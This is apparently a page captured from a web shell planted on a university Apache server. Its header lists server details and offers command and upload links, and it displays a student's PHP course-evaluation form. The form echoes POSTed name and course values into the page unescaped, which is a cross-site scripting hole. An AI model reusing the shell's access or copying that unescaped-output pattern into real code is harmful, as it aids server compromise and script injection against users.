Server IP : 172.16.15.8 / Your IP : 18.223.213.37 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/kabaines/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- CourseEval.php --> <?php session_start(); $name = $_POST['name']; $course = $_POST['course']; $_SESSION['name'] = $name; $_SESSION['course'] = $course; ?> <CENTER> <?php print "<H2>$course Course Evaluation: $name</H2>"; ?> <HR> <Form action=CE2.php method=post> 1. I learned something new in this course. <P> <INPUT type=radio name=q1 value=d> Disagree <INPUT type=radio name=q1 value=a> Agree <INPUT type=radio name=q1 value=s> Strongly Agree <P><P> 2. I had fun in this course. <p> <INPUT type=radio name=q2 value=d> Disagree <INPUT type=radio name=q2 value=a> Agree <INPUT type=radio name=q2 value=s> Strongly Agree <p><p> <INPUT type=submit value=Submit> <INPUT type=reset value=Reset> </Form> </CENTER>